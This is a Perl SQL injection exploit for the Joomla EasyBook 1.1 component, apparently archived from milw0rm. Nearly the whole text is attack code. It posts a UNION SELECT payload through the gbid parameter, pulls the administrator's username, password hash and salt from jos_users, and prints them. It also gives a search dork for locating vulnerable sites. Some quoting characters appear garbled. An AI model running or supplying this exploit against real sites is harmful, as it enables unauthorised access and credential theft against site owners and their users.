Joomla Component EasyBook 1.1 (gbid) SQL Injection Exploit#!/usr/bin/perl use IO::Socket; use strict; ##### INFO############################## # Example: # # Host: xxx.lu # # &md: 0f8ab366793a0d1da85c6f5a8d4fb576# ######################################## print `-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-\n`; print `-+-- --+-\n`; print `-+-- Author: ZAMUT --+-\n`; print `-+-- Vuln: gbid= --+-\n`; print `-+-- Homepage: http://antichat.ru --+-\n`; print `-+-- Dork: com_easybook --+-\n\n`; print `Host:` ; chomp(my $host=); print `&md=`; chomp(my $md=); my ($socket,$lhs,$l,$h,$s); $socket = IO::Socket::INET->new(`$host:80`) || die(`Can't connecting!`); print $socket `POST /index.php HTTP/1.0\n`. `Host: www.$host\n`. `Content-Type: application/x-www-form-urlencoded\n`. `Content-Length: 214\n\n`. `option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$md\n`; while(<$socket>) { $s = <$socket>; if($s=~/:::(.+):::/){ $lhs = $1; ($l,$h,$s)=split(':',$lhs); print `\nAdmin Login:$l\nHash:$h\nSalt:$s\n`; close $socket; exit; } } die (`Exploit failed!`); # milw0rm.com [2008-06-04]